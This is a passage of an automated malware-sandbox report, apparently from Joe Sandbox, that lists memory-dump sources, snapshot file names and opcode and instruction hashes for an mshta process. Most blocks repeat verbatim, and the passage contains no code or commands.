                                                                                                                                                                                                                                        • Instruction ID: e05eadea12e8b5d3c61725c860376dbf45120fb8eafab68730bf4e56d8d4ed5d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99C0123270A1048B8700CE8DECC089AF398FB88274B1487A7EE08CB222DA91DC244B91
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474397393.000000000E9B5000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B6000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
                                                                                                                                                                                                                                        • Instruction ID: e05eadea12e8b5d3c61725c860376dbf45120fb8eafab68730bf4e56d8d4ed5d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99C0123270A1048B8700CE8DECC089AF398FB88274B1487A7EE08CB222DA91DC244B91
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474397393.000000000E9B5000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B5000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
                                                                                                                                                                                                                                        • Instruction ID: e05eadea12e8b5d3c61725c860376dbf45120fb8eafab68730bf4e56d8d4ed5d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99C0123270A1048B8700CE8DECC089AF398FB88274B1487A7EE08CB222DA91DC244B91
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474397393.000000000E9B5000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B0000, based on PE: false
                                                                                                                                                                                                                                        • Associated: 00000001.00000003.12474357204.000000000E9B0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3cb64990fcddd3bef09b386d8983a2716f06ba67a974b1cc0b3b587d0717bd44
                                                                                                                                                                                                                                        • Instruction ID: 20408d6010dc732db25981057240c49e58c36886531ceb99848d0fada10f5c2a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cb64990fcddd3bef09b386d8983a2716f06ba67a974b1cc0b3b587d0717bd44
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BB0121230B0181698102C6B3C420F5F74AE7904391000BE7DD49410405E03181308D2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474397393.000000000E9B5000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E9B5000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_e9b0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3cb64990fcddd3bef09b386d8983a2716f06ba67a974b1cc0b3b587d0717bd44
                                                                                                                                                                                                                                        • Instruction ID: 20408d6010dc732db25981057240c49e58c36886531ceb99848d0fada10f5c2a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cb64990fcddd3bef09b386d8983a2716f06ba67a974b1cc0b3b587d0717bd44
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BB0121230B0181698102C6B3C420F5F74AE7904391000BE7DD49410405E03181308D2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
